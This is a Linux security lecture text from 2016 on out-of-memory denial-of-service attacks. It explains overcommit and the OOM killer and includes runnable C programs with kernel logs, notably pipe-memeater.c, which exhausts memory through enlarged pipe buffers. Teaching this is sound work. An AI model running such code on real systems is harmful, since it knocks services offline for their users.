Security Camp national convention 2016   Analysis track 3D

The OOM CTF

2016.8.11

Index


Chapter 0   About this page


The memory management subsystem in the Linux kernel is very optimistic. Therefore, unless resources are appropriately restricted using memory cgroup, it is easy to make Linux systems defunctional due to depletion of system memory via out of memory local DoS attacks. And it is causing a factor for disturbing Linux system's stable operations such as unexplained hang up, for it is possible to by chance form an attack without intention to attack.

In this lecture, you will learn how to find bugs (bug hunting) caused by depletion of depletion of memory, look back on mortal combat on Linux kernel's memory management subsystem (which started from a vulnerability I by chance found, and still ongoing), and think about what we should do against the reality that we cannot eradicate bugs caused by depletion of memory.

Expected skills for audiences


0.1 Warnings

Never abuse.

Many sample programs which form out of memory local DoS attacks are introduced. It is no good to execute these programs on machines you are not administrating.

Even in the offense and defense CTF competitions, you might be disqualified for "actions which puts excessive stresses" if you execute these programs.

There will be several errors.

I'm not an expert of memory management subsystem. Also, I have never diligently studied by reading books about Linux kernels. In this lecture, I explain things which I learned from my experiences and which are not explained in technical description books.


0.2 Target environments

Reproducer programs are made for below environment. You may use virtual environments such as VMware Player.

CPUs4 ( x86_64 architecture)
RAM1024MB or 2048MB (Not numa system)
swap partitionsnone
Hard diskA disk recognized as /dev/sda
(You might fail to reproduce if not recognized as a SCSI device)
CD-ROMA drive recognized as /dev/sr0
(You might fail to reproduce if not recognized as a SCSI device)
Mount treeOnly / partition from /dev/sda1 formatted as ext4 or xfs

Please understand that results would differ due to variable factors such as kernel versions, system configurations, executed timings.


0.3 Self introduction: My relevance with Linux

Security enhancement at OS level

From April 2003 till March 2012, I was involved in development of access control modules named TOMOYO Linux. While we cannot eradicate bugs such as buffer overflow vulnerability and/or OS command injection vulnerability, there was only one access control module named SELinux which is so cryptographic to use when TOMOYO project started.

Regarding war stories of mainlining TOMOYO Linux, please see lecture text for Security & programming camp 2011 (written in Japanese).

Regarding the history of starting from TOMOYO Linux till reaching AKARI and CaitSith, please see lecture text for Security camp 2012.

If you are interested in protection against OS command injection vulnerability (e.g. ShellShock), please see lecture text for Security camp 2015 (written in Japanese).

Troubleshooting Linux systems

From April 2012 till March 2015, I was involved in responding to the inquiries of (mainly) RHEL 4 / RHEL 5 / RHEL 6 systems at a support center. Since I experienced Linux kernel programming via the development of TOMOYO Linux (due to the nature of access control modules, only areas close to userspace though), I handled inquiries of problems which steps for reproducing and/or examining the problems are not established yet and therefore needs to identify what is happening (by writing programs for examination).

It is common to get support requests for examining the cause of unexpected hangups or reboots. But it seldom succeeded to identify the cause of hangups because there was no clue message in /var/log/messages .

I proposed enabling serial consoles and/or netconsole with an expectation that "Although we cannot expect that messages during hang up situation are recorded to log files, the kernel might have printed something during hang up situation.", but we did not get any messages as far as I remember. It was frustrating situation as if encountering unsolvable challenges one after another in the Capture The Flag (CTF) games.


0.4 Introducing main characters?

You can trace the discussions since November 2014 (mainly) at archive of linux-mm mailing list.


Chapter 1   Warm-up exercises


1.1 About memory overcommitting

In userspace, memory allocation requests seldom fail. We can ask for more memory than the system has using malloc() etc. because memory overcommitting is permitted by default.

Experiment: Let's try memory overcommitting using realloc().

---------- overcommit.c ----------
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
        unsigned long size = 0;
        char *buf = NULL;
        while (1) {
                char *cp = realloc(buf, size + 1048576);
                if (!cp)
                        break;
                buf = cp;
                size += 1048576;
        }
        printf("Allocated %lu MB\n", size / 1048576);
        free(buf);
        printf("Freed %lu MB\n", size / 1048576);
        return 0;
}
---------- overcommit.c ----------

Result: We can confirm that memory is overcommitted.

---------- Example output start ----------
[kumaneko@localhost ~]$ cat /proc/meminfo
MemTotal:        1914588 kB
MemFree:         1758600 kB
Buffers:            9044 kB
Cached:            55324 kB
SwapCached:            0 kB
Active:            38408 kB
Inactive:          42832 kB
Active(anon):      17112 kB
Inactive(anon):        4 kB
Active(file):      21296 kB
Inactive(file):    42828 kB
Unevictable:           0 kB
Mlocked:               0 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                64 kB
Writeback:             0 kB
AnonPages:         16888 kB
Mapped:            12552 kB
Shmem:               228 kB
Slab:              36644 kB
SReclaimable:      10984 kB
SUnreclaim:        25660 kB
KernelStack:        3760 kB
PageTables:         2892 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:      957292 kB
Committed_AS:      92500 kB
VmallocTotal:   34359738367 kB
VmallocUsed:      149588 kB
VmallocChunk:   34359581684 kB
HardwareCorrupted:     0 kB
AnonHugePages:      2048 kB
HugePages_Total:       0
HugePages_Free:        0
HugePages_Rsvd:        0
HugePages_Surp:        0
Hugepagesize:       2048 kB
DirectMap4k:        6144 kB
DirectMap2M:     1042432 kB
DirectMap1G:     1048576 kB
[kumaneko@localhost ~]$ ./overcommit
Allocated 100663295 MB
Freed 100663295 MB
[kumaneko@localhost ~]$ 
---------- Example output end ----------

Thanks to memory overcommitting, we can run many processes.


1.2 About OOM killer

Purpose/Use

A mechanism for trying to survive the Linux systems by solving out of memory (OOM) situation when OOM situation occurred.

Reclaims memory by forcibly terminating processes by sending SIGKILL signal.

Assumes that we can always reclaim memory because SIGKILL signal cannot be ignored.

Risk level 0: We have enough room.Risk level 1: We are close to problems.Risk level 2: OOM situation occurred.Risk level 3: The game is over.
If there is plenty of free memory, we don't need to reclaim memory.When free memory reduced to low: watermark, kswapd process asynchronously reclaims memory until free memory recovers to high: watermark. If asynchronous reclaim by kswapd is not sufficient, synchronous reclaim (direct reclaim) by allocating process is performed. If free memory reduced to min: watermark, and nobody can reclaim memory any more, the system is in OOM situation. If it is allowed to invoke the OOM killer, the OOM killer reclaims memory by terminating processes by sending SIGKILL signal.If free memory reaches 0, the system will hang up in most cases.
Above High Between Low and High Reached Min Depleted

Experiment: Let's invoke OOM killer by using memset() after overcommitting with realloc().

---------- oom.c ----------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
        unsigned long size = 0;
        char *buf = NULL;
        while (1) {
                char *cp = realloc(buf, size + 1048576);
                if (!cp)
                        break;
                buf = cp;
                size += 1048576;
        }
        printf("Allocated %lu MB\n", size / 1048576);
        memset(buf, 0, size);
        printf("Filled %lu MB\n", size / 1048576);
        free(buf);
        printf("Freed %lu MB\n", size / 1048576);
        return 0;
}
---------- oom.c ----------

Result: We can confirm that process is forcibly terminated by SIGKILL signal.

---------- Example output start ----------
[kumaneko@localhost ~]$ ./oom
Allocated 100663295 MB
Killed
[kumaneko@localhost ~]$ dmesg
[  164.825320] oom invoked oom-killer: gfp_mask=0x280da, order=0, oom_adj=0, oom_score_adj=0
[  164.826957] oom cpuset=/ mems_allowed=0
[  164.827789] Pid: 1615, comm: oom Not tainted 2.6.32-573.26.1.el6.x86_64 #1
[  164.829140] Call Trace:
[  164.829593]  [<ffffffff810d7151>] ? cpuset_print_task_mems_allowed+0x91/0xb0
[  164.830855]  [<ffffffff8112a950>] ? dump_header+0x90/0x1b0
[  164.832089]  [<ffffffff8123360c>] ? security_real_capable_noaudit+0x3c/0x70
[  164.833303]  [<ffffffff8112add2>] ? oom_kill_process+0x82/0x2a0
[  164.834402]  [<ffffffff8112ad11>] ? select_bad_process+0xe1/0x120
[  164.835512]  [<ffffffff8112b210>] ? out_of_memory+0x220/0x3c0
[  164.836543]  [<ffffffff81137bec>] ? __alloc_pages_nodemask+0x93c/0x950
[  164.837692]  [<ffffffff81170a7a>] ? alloc_pages_vma+0x9a/0x150
[  164.838743]  [<ffffffff81152edd>] ? handle_pte_fault+0x73d/0xb20
[  164.839886]  [<ffffffff810537b7>] ? pte_alloc_one+0x37/0x50
[  164.841020]  [<ffffffff8118c559>] ? do_huge_pmd_anonymous_page+0xb9/0x3b0
[  164.842306]  [<ffffffff81153559>] ? handle_mm_fault+0x299/0x3d0
[  164.843400]  [<ffffffff810663f3>] ? perf_event_task_sched_out+0x33/0x70
[  164.844603]  [<ffffffff8104f156>] ? __do_page_fault+0x146/0x500
[  164.845672]  [<ffffffff8153927e>] ? thread_return+0x4e/0x7d0
[  164.846723]  [<ffffffff8153f90e>] ? do_page_fault+0x3e/0xa0
[  164.847953]  [<ffffffff8153cc55>] ? page_fault+0x25/0x30
[  164.848914] Mem-Info:
[  164.849339] Node 0 DMA per-cpu:
[  164.849937] CPU    0: hi:    0, btch:   1 usd:   0
[  164.850804] CPU    1: hi:    0, btch:   1 usd:   0
[  164.851781] CPU    2: hi:    0, btch:   1 usd:   0
[  164.852670] CPU    3: hi:    0, btch:   1 usd:   0
[  164.853632] Node 0 DMA32 per-cpu:
[  164.854269] CPU    0: hi:  186, btch:  31 usd:   0
[  164.855133] CPU    1: hi:  186, btch:  31 usd:   0
[  164.856152] CPU    2: hi:  186, btch:  31 usd:   0
[  164.857041] CPU    3: hi:  186, btch:  31 usd:   0
[  164.858033] active_anon:446933 inactive_anon:1 isolated_anon:0
[  164.858034]  active_file:0 inactive_file:14 isolated_file:0
[  164.858034]  unevictable:0 dirty:1 writeback:0 unstable:0
[  164.858034]  free:13259 slab_reclaimable:1902 slab_unreclaimable:6401
[  164.858035]  mapped:9 shmem:57 pagetables:1732 bounce:0
[  164.863169] Node 0 DMA free:8336kB min:332kB low:412kB high:496kB active_anon:7332kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:0kB kernel_stack:0kB pagetables:40kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  164.870125] lowmem_reserve[]: 0 2004 2004 2004
[  164.871060] Node 0 DMA32 free:44700kB min:44720kB low:55900kB high:67080kB active_anon:1780400kB inactive_anon:4kB active_file:0kB inactive_file:56kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:4kB writeback:0kB mapped:36kB shmem:228kB slab_reclaimable:7608kB slab_unreclaimable:25604kB kernel_stack:3776kB pagetables:6888kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:690 all_unreclaimable? yes
[  164.878996] lowmem_reserve[]: 0 0 0 0
[  164.879969] Node 0 DMA: 2*4kB 1*8kB 4*16kB 2*32kB 2*64kB 1*128kB 1*256kB 1*512kB 1*1024kB 1*2048kB 1*4096kB = 8336kB
[  164.882265] Node 0 DMA32: 496*4kB 137*8kB 45*16kB 26*32kB 38*64kB 11*128kB 2*256kB 8*512kB 13*1024kB 5*2048kB 2*4096kB = 44824kB
[  164.884786] 99 total pagecache pages
[  164.885462] 0 pages in swap cache
[  164.886100] Swap cache stats: add 0, delete 0, find 0/0
[  164.887027] Free swap  = 0kB
[  164.887677] Total swap = 0kB
[  164.890966] 524272 pages RAM
[  164.891554] 45689 pages reserved
[  164.892198] 460 pages shared
[  164.892760] 459990 pages non-shared
[  164.893400] [ pid ]   uid  tgid total_vm      rss cpu oom_adj oom_score_adj name
[  164.894783] [  485]     0   485     2672      118   3     -17         -1000 udevd
[  164.896319] [ 1139]     0  1139     2280      123   2       0             0 dhclient
[  164.897721] [ 1195]     0  1195     6899       60   2     -17         -1000 auditd
[  164.899068] [ 1217]     0  1217    62272      649   0       0             0 rsyslogd
[  164.900463] [ 1246]    81  1246     5388      107   1       0             0 dbus-daemon
[  164.901944] [ 1259]     0  1259    20705      222   0       0             0 NetworkManager
[  164.903465] [ 1263]     0  1263    14530      124   3       0             0 modem-manager
[  164.905125] [ 1298]    68  1298     9588      292   3       0             0 hald
[  164.906547] [ 1299]     0  1299     5099       54   3       0             0 hald-runner
[  164.908127] [ 1337]     0  1337     5627       47   1       0             0 hald-addon-rfki
[  164.909747] [ 1345]     0  1345     5629       47   0       0             0 hald-addon-inpu
[  164.911254] [ 1346]     0  1346    11247      133   2       0             0 wpa_supplicant
[  164.912993] [ 1351]    68  1351     4501       41   2       0             0 hald-addon-acpi
[  164.914570] [ 1372]     0  1372    16558      177   0     -17         -1000 sshd
[  164.915955] [ 1451]     0  1451    20222      226   2       0             0 master
[  164.917391] [ 1463]    89  1463    20242      217   0       0             0 pickup
[  164.918860] [ 1464]    89  1464    20259      218   1       0             0 qmgr
[  164.920391] [ 1465]     0  1465    29216      152   2       0             0 crond
[  164.921769] [ 1479]     0  1479    17403      127   3       0             0 login
[  164.923171] [ 1480]     0  1480     1020       23   0       0             0 agetty
[  164.924621] [ 1482]     0  1482     1016       21   3       0             0 mingetty
[  164.926043] [ 1484]     0  1484     1016       21   3       0             0 mingetty
[  164.927490] [ 1486]     0  1486     1016       22   3       0             0 mingetty
[  164.928890] [ 1488]     0  1488     1016       20   3       0             0 mingetty
[  164.930313] [ 1490]     0  1490     1016       22   2       0             0 mingetty
[  164.931718] [ 1495]     0  1495     2671      117   1     -17         -1000 udevd
[  164.933090] [ 1496]     0  1496     2671      117   3     -17         -1000 udevd
[  164.934490] [ 1498]     0  1498   521256      370   1       0             0 console-kit-dae
[  164.935999] [ 1565]     0  1565    27075      101   1       0             0 bash
[  164.937387] [ 1580]     0  1580    25629      254   0       0             0 sshd
[  164.938787] [ 1582]   500  1582    25629      252   0       0             0 sshd
[  164.940167] [ 1583]   500  1583    27076       97   0       0             0 bash
[  164.941506] [ 1615]   500  1615 25769820886   442651   2       0             0 oom
[  164.942905] Out of memory: Kill process 1615 (oom) score 926 or sacrifice child
[  164.944495] Killed process 1615, UID 500, (oom) total-vm:103079283544kB, anon-rss:1770600kB, file-rss:4kB
[kumaneko@localhost ~]$
---------- Example output end ----------

It seems that OOM killer is functional, doesn't it?


1.3 About system wide OOM situation and memory cgroup OOM situation

Linux provides cgroup functionality for restricting resource usage, and memory cgroup (which is one of cgroup functionality) can restrict memory usage based on a group which a process belongs to. But if memory cgroup is not appropriately configured, system wide OOM situation will occur after all.

In this lecture, I basically assume only system wide OOM situation.


1.4 About parameters for users

If I end here, it is nothing but a user's guide. In this lecture, I explain about contradiction in memory management subsystem.


Chapter 2   DoS attack using pipes


2.1 The beginning

One day in July 2013, I noticed a strange patch when doing "git bisect" for debugging some problem in the development kernel.

  [35f3d14dbbc58447c61e38a162ea10add6b31dc7] pipe: add support for shrinking and growing pipes

"Huh? Allow changing pipe's size? I didn't know such functionality was added."

  ··· I checked for relevant patches, and it turned out that an unprivileged user can grow pipe's buffer size from, 64KB to 1MB.

"What!? Are you sane that you allow anyone to grow pipe's buffer size up to 1MB?"

Experiment: What will happen if all memory is assigned for pipe's buffer?

---------- pipe-memeater.c ----------
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define F_SETPIPE_SZ (1024 + 7)

static void child(void)
{
        int fd[2];
        while (pipe(fd) != EOF &&
               fcntl(fd[1], F_SETPIPE_SZ, 1048576) != EOF) {
                int i;
                for (i = 0; i < 256; i++) {
                        static char buf[4096];
                        if (write(fd[1], buf, sizeof(buf)) != sizeof(buf)) {
                                printf("write error\n");
                                _exit(1);
                        }
                }
                close(fd[0]);
        }
        pause();
        _exit(0);
}

int main(int argc, char *argv[])
{
        int i;
        close(0);
        for (i = 2; i < 1024; i++)
                close(i);
        for (i = 0; i < 10; i++)
                if (fork() == 0)
                        child();
        return 0;
}
---------- pipe-memeater.c ----------

Result: Almost all processes are killed OOM killer.

---------- Example output start ----------
[kumaneko@localhost ~]$ pstree -pA
init(1)-+-NetworkManager(1206)
        |-agetty(1430)
        |-auditd(1142)---{auditd}(1143)
        |-bonobo-activati(1630)---{bonobo-activat}(1631)
        |-console-kit-dae(1440)-+-{console-kit-da}(1441)
        |                       |-{console-kit-da}(1442)
        |                       |-{console-kit-da}(1443)
        |                       |-{console-kit-da}(1444)
        |                       |-{console-kit-da}(1445)
        |                       |-{console-kit-da}(1446)
        |                       |-{console-kit-da}(1447)
        |                       |-{console-kit-da}(1448)
        |                       |-{console-kit-da}(1449)
        |                       |-{console-kit-da}(1450)
        |                       |-{console-kit-da}(1451)
        |                       |-{console-kit-da}(1452)
        |                       |-{console-kit-da}(1453)
        |                       |-{console-kit-da}(1454)
        |                       |-{console-kit-da}(1455)
        |                       |-{console-kit-da}(1456)
        |                       |-{console-kit-da}(1457)
        |                       |-{console-kit-da}(1458)
        |                       |-{console-kit-da}(1459)
        |                       |-{console-kit-da}(1460)
        |                       |-{console-kit-da}(1461)
        |                       |-{console-kit-da}(1462)
        |                       |-{console-kit-da}(1463)
        |                       |-{console-kit-da}(1464)
        |                       |-{console-kit-da}(1465)
        |                       |-{console-kit-da}(1466)
        |                       |-{console-kit-da}(1467)
        |                       |-{console-kit-da}(1468)
        |                       |-{console-kit-da}(1469)
        |                       |-{console-kit-da}(1470)
        |                       |-{console-kit-da}(1471)
        |                       |-{console-kit-da}(1472)
        |                       |-{console-kit-da}(1473)
        |                       |-{console-kit-da}(1474)
        |                       |-{console-kit-da}(1475)
        |                       |-{console-kit-da}(1476)
        |                       |-{console-kit-da}(1477)
        |                       |-{console-kit-da}(1478)
        |                       |-{console-kit-da}(1479)
        |                       |-{console-kit-da}(1480)
        |                       |-{console-kit-da}(1481)
        |                       |-{console-kit-da}(1482)
        |                       |-{console-kit-da}(1483)
        |                       |-{console-kit-da}(1484)
        |                       |-{console-kit-da}(1485)
        |                       |-{console-kit-da}(1486)
        |                       |-{console-kit-da}(1487)
        |                       |-{console-kit-da}(1488)
        |                       |-{console-kit-da}(1489)
        |                       |-{console-kit-da}(1490)
        |                       |-{console-kit-da}(1491)
        |                       |-{console-kit-da}(1492)
        |                       |-{console-kit-da}(1493)
        |                       |-{console-kit-da}(1494)
        |                       |-{console-kit-da}(1495)
        |                       |-{console-kit-da}(1496)
        |                       |-{console-kit-da}(1497)
        |                       |-{console-kit-da}(1498)
        |                       |-{console-kit-da}(1499)
        |                       |-{console-kit-da}(1500)
        |                       |-{console-kit-da}(1501)
        |                       |-{console-kit-da}(1502)
        |                       `-{console-kit-da}(1504)
        |-crond(1408)
        |-dbus-daemon(1601)
        |-dbus-daemon(1193)
        |-dbus-launch(1600)
        |-devkit-power-da(1605)
        |-dhclient(1086)
        |-gconfd-2(1609)
        |-gdm-binary(1567)-+-gdm-simple-slav(1580)-+-Xorg(1583)
        |                  |                       |-gdm-session-wor(1661)
        |                  |                       |-gnome-session(1602)-+-at-spi-registry(1625)
        |                  |                       |                     |-gdm-simple-gree(1641)---{gdm-simple-gre}(1652)
        |                  |                       |                     |-gnome-power-man(1642)
        |                  |                       |                     |-metacity(1638)
        |                  |                       |                     |-polkit-gnome-au(1640)
        |                  |                       |                     `-{gnome-session}(1626)
        |                  |                       `-{gdm-simple-sla}(1584)
        |                  `-{gdm-binary}(1581)
        |-gnome-settings-(1628)---{gnome-settings}(1633)
        |-gvfsd(1637)
        |-hald(1245)-+-hald-runner(1246)-+-hald-addon-acpi(1295)
        |            |                   |-hald-addon-inpu(1293)
        |            |                   `-hald-addon-rfki(1285)
        |            `-{hald}(1247)
        |-login(1424)---bash(1507)
        |-master(1396)-+-pickup(1411)
        |              `-qmgr(1413)
        |-mingetty(1426)
        |-mingetty(1428)
        |-mingetty(1431)
        |-mingetty(1433)
        |-mingetty(1435)
        |-modem-manager(1211)
        |-notification-da(1651)
        |-polkitd(1645)
        |-pulseaudio(1654)---{pulseaudio}(1660)
        |-rsyslogd(1164)-+-{rsyslogd}(1165)
        |                |-{rsyslogd}(1166)
        |                `-{rsyslogd}(1167)
        |-rtkit-daemon(1656)-+-{rtkit-daemon}(1657)
        |                    `-{rtkit-daemon}(1658)
        |-sshd(1317)---sshd(1664)---sshd(1666)---bash(1667)---pstree(1684)
        |-udevd(423)-+-udevd(1437)
        |            `-udevd(1438)
        `-wpa_supplicant(1282)
[kumaneko@localhost ~]$ ./pipe-memeater
(Omitting re-login operation)
[kumaneko@localhost ~]$ dmesg
[  100.086247] pipe-memeater invoked oom-killer: gfp_mask=0x200d2, order=0, oom_adj=0
[  100.087747] pipe-memeater cpuset=/ mems_allowed=0
[  100.088693] Pid: 1687, comm: pipe-memeater Not tainted 2.6.35.14 #1
[  100.089949] Call Trace:
[  100.090640]  [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0
[  100.092080]  [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0
[  100.093106]  [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120
[  100.094226]  [<ffffffff810f9021>] oom_kill_process+0x81/0x180
[  100.095432]  [<ffffffff810f9558>] __out_of_memory+0x58/0xd0
[  100.096745]  [<ffffffff810f9656>] out_of_memory+0x86/0x1b0
[  100.097796]  [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0
[  100.098990]  [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100
[  100.100181]  [<ffffffff8114de87>] pipe_write+0x387/0x670
[  100.101200]  [<ffffffff8114504a>] do_sync_write+0xda/0x120
[  100.102284]  [<ffffffff8114e7ad>] ? pipe_fcntl+0x11d/0x230
[  100.103319]  [<ffffffff8113583c>] ? __kmalloc+0x21c/0x230
[  100.104381]  [<ffffffff811cb556>] ? security_file_permission+0x16/0x20
[  100.105659]  [<ffffffff81145328>] vfs_write+0xb8/0x1a0
[  100.106684]  [<ffffffff810ba932>] ? audit_syscall_entry+0x252/0x280
[  100.108022]  [<ffffffff81145cd1>] sys_write+0x51/0x90
[  100.109007]  [<ffffffff8100aff2>] system_call_fastpath+0x16/0x1b
[  100.110197] Mem-Info:
[  100.110644] Node 0 DMA per-cpu:
[  100.111327] CPU    0: hi:    0, btch:   1 usd:   0
[  100.112277] CPU    1: hi:    0, btch:   1 usd:   0
[  100.113140] CPU    2: hi:    0, btch:   1 usd:   0
[  100.114110] CPU    3: hi:    0, btch:   1 usd:   0
[  100.114971] Node 0 DMA32 per-cpu:
[  100.115658] CPU    0: hi:  186, btch:  31 usd:   0
[  100.116654] CPU    1: hi:  186, btch:  31 usd:  32
[  100.117595] CPU    2: hi:  186, btch:  31 usd:   0
[  100.118537] CPU    3: hi:  186, btch:  31 usd:   0
[  100.119483] active_anon:11091 inactive_anon:3641 isolated_anon:0
[  100.119484]  active_file:21 inactive_file:24 isolated_file:0
[  100.119485]  unevictable:0 dirty:21 writeback:0 unstable:0
[  100.119485]  free:3422 slab_reclaimable:4462 slab_unreclaimable:22253
[  100.119485]  mapped:276 shmem:305 pagetables:1864 bounce:0
[  100.125138] Node 0 DMA free:8024kB min:40kB low:48kB high:60kB active_anon:0kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15704kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:0kB slab_unreclaimable:100kB kernel_stack:0kB pagetables:0kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  100.132211] lowmem_reserve[]: 0 2004 2004 2004
[  100.133220] Node 0 DMA32 free:5664kB min:5708kB low:7132kB high:8560kB active_anon:44108kB inactive_anon:14820kB active_file:84kB inactive_file:96kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2052192kB mlocked:0kB dirty:84kB writeback:0kB mapped:1104kB shmem:1220kB slab_reclaimable:17848kB slab_unreclaimable:88912kB kernel_stack:2008kB pagetables:7456kB unstable:0kB bounce:0kB writeback_tmp:0kB pages_scanned:1412 all_unreclaimable? yes
[  100.141024] lowmem_reserve[]: 0 0 0 0
[  100.141879] Node 0 DMA: 1*4kB 2*8kB 0*16kB 2*32kB 2*64kB 1*128kB 2*256kB 2*512kB 2*1024kB 2*2048kB 0*4096kB = 8020kB
[  100.144271] Node 0 DMA32: 676*4kB 7*8kB 0*16kB 0*32kB 1*64kB 1*128kB 0*256kB 0*512kB 1*1024kB 1*2048kB 0*4096kB = 6024kB
[  100.146722] 346 total pagecache pages
[  100.147435] 0 pages in swap cache
[  100.148090] Swap cache stats: add 0, delete 0, find 0/0
[  100.149096] Free swap  = 0kB
[  100.149671] Total swap = 0kB
[  100.152844] 524272 pages RAM
[  100.153432] 13239 pages reserved
[  100.154126] 1067 pages shared
[  100.154695] 488972 pages non-shared
[  100.155379] [ pid ]   uid  tgid total_vm      rss cpu oom_adj name
[  100.156582] [    1]     0     1     4851       75   1       0 init
[  100.157793] [  423]     0   423     2767      200   0     -17 udevd
[  100.158985] [ 1086]     0  1086     2292      122   1       0 dhclient
[  100.160335] [ 1142]     0  1142     6399       49   1     -17 auditd
[  100.161553] [ 1164]     0  1164    60746       96   1       0 rsyslogd
[  100.162787] [ 1193]    81  1193     5471      159   3       0 dbus-daemon
[  100.164070] [ 1206]     0  1206    20717      219   0       0 NetworkManager
[  100.165406] [ 1211]     0  1211    14542      123   1       0 modem-manager
[  100.166709] [ 1245]    68  1245     9089      296   0       0 hald
[  100.167855] [ 1246]     0  1246     5111       56   3       0 hald-runner
[  100.169135] [ 1282]     0  1282    11259      132   3       0 wpa_supplicant
[  100.170476] [ 1285]     0  1285     5639       42   1       0 hald-addon-rfki
[  100.171936] [ 1293]     0  1293     5641       42   0       0 hald-addon-inpu
[  100.173260] [ 1295]    68  1295     4513       40   3       0 hald-addon-acpi
[  100.174622] [ 1317]     0  1317    16570      177   0     -17 sshd
[  100.175790] [ 1396]     0  1396    20234      218   0       0 master
[  100.177024] [ 1408]     0  1408    29216      152   2       0 crond
[  100.178188] [ 1411]    89  1411    20254      217   1       0 pickup
[  100.179389] [ 1413]    89  1413    20271      216   1       0 qmgr
[  100.180571] [ 1424]     0  1424    17415      123   3       0 login
[  100.181737] [ 1426]     0  1426     1028       21   2       0 mingetty
[  100.182983] [ 1428]     0  1428     1028       21   3       0 mingetty
[  100.184222] [ 1430]     0  1430     1032       21   0       0 agetty
[  100.185481] [ 1431]     0  1431     1028       21   1       0 mingetty
[  100.187031] [ 1433]     0  1433     1028       20   1       0 mingetty
[  100.188345] [ 1435]     0  1435     1028       21   2       0 mingetty
[  100.189638] [ 1437]     0  1437     2683      116   3     -17 udevd
[  100.190865] [ 1438]     0  1438     2683      116   2     -17 udevd
[  100.192152] [ 1440]     0  1440   520756      243   3       0 console-kit-dae
[  100.193565] [ 1507]     0  1507    27088       95   1       0 bash
[  100.194796] [ 1567]     0  1567    33001       79   1       0 gdm-binary
[  100.196134] [ 1580]     0  1580    40656      150   3       0 gdm-simple-slav
[  100.197543] [ 1583]     0  1583    42848     4384   2       0 Xorg
[  100.198911] [ 1600]    42  1600     5021       55   1       0 dbus-launch
[  100.200288] [ 1601]    42  1601     5402       79   3       0 dbus-daemon
[  100.201579] [ 1602]    42  1602    66762      476   3       0 gnome-session
[  100.202944] [ 1605]     0  1605    12502      161   3       0 devkit-power-da
[  100.204322] [ 1609]    42  1609    33068      538   0       0 gconfd-2
[  100.205580] [ 1625]    42  1625    30187      283   0       0 at-spi-registry
[  100.206961] [ 1628]    42  1628    86331      943   0       0 gnome-settings-
[  100.208318] [ 1630]    42  1630    88624      186   1       0 bonobo-activati
[  100.210025] [ 1637]    42  1637    33831       76   2       0 gvfsd
[  100.211269] [ 1638]    42  1638    71465      679   0       0 metacity
[  100.212521] [ 1640]    42  1640    62088      437   3       0 polkit-gnome-au
[  100.213886] [ 1641]    42  1641    94596     1210   2       0 gdm-simple-gree
[  100.215265] [ 1642]    42  1642    68437      516   2       0 gnome-power-man
[  100.216677] [ 1645]     0  1645    13169      304   1       0 polkitd
[  100.217893] [ 1654]    42  1654    85934      194   1       0 pulseaudio
[  100.220379] [ 1656]   498  1656    41101       45   2       0 rtkit-daemon
[  100.221717] [ 1661]     0  1661    35453       91   1       0 gdm-session-wor
[  100.223103] [ 1664]     0  1664    25640      254   0       0 sshd
[  100.224290] [ 1666]   500  1666    25640      252   0       0 sshd
[  100.225575] [ 1667]   500  1667    27088       92   3       0 bash
[  100.226844] [ 1686]   500  1686      993       18   0       0 pipe-memeater
[  100.228117] [ 1687]   500  1687      993       18   3       0 pipe-memeater
[  100.229486] [ 1688]   500  1688      993       18   1       0 pipe-memeater
[  100.230815] [ 1689]   500  1689      993       18   0       0 pipe-memeater
[  100.232127] [ 1690]   500  1690      993       18   2       0 pipe-memeater
[  100.233439] [ 1691]   500  1691      993       18   0       0 pipe-memeater
[  100.234773] [ 1692]   500  1692      993       18   1       0 pipe-memeater
[  100.236084] [ 1693]   500  1693      993       18   0       0 pipe-memeater
[  100.237375] [ 1694]   500  1694      993       18   2       0 pipe-memeater
[  100.238727] [ 1695]   500  1695      993       18   0       0 pipe-memeater
[  100.240035] Out of memory: kill process 1602 (gnome-session) score 230152 or a child
[  100.241502] Killed process 1625 (at-spi-registry) vsz:120748kB, anon-rss:1132kB, file-rss:0kB
(Omitting repetitions)
[  117.042248] pipe-memeater invoked oom-killer: gfp_mask=0x201da, order=0, oom_adj=0
[  117.047397] pipe-memeater cpuset=/ mems_allowed=0
[  117.050821] Pid: 1695, comm: pipe-memeater Not tainted 2.6.35.14 #1
[  117.055079] Call Trace:
[  117.056842]  [<ffffffff810ac9e1>] ? cpuset_print_task_mems_allowed+0x91/0xa0
[  117.061573]  [<ffffffff810f8e4e>] dump_header+0x6e/0x1c0
[  117.065216]  [<ffffffff8121b950>] ? ___ratelimit+0xa0/0x120
[  117.069040]  [<ffffffff810f9021>] oom_kill_process+0x81/0x180
[  117.072962]  [<ffffffff810f9558>] __out_of_memory+0x58/0xd0
[  117.076774]  [<ffffffff810f9656>] out_of_memory+0x86/0x1b0
[  117.080130]  [<ffffffff810fe4dc>] __alloc_pages_nodemask+0x7dc/0x7f0
[  117.081905]  [<ffffffff810503f9>] ? finish_task_switch+0x49/0xb0
[  117.083564]  [<ffffffff8112e87a>] alloc_pages_current+0x9a/0x100
[  117.085189]  [<ffffffff810f6627>] __page_cache_alloc+0x87/0x90
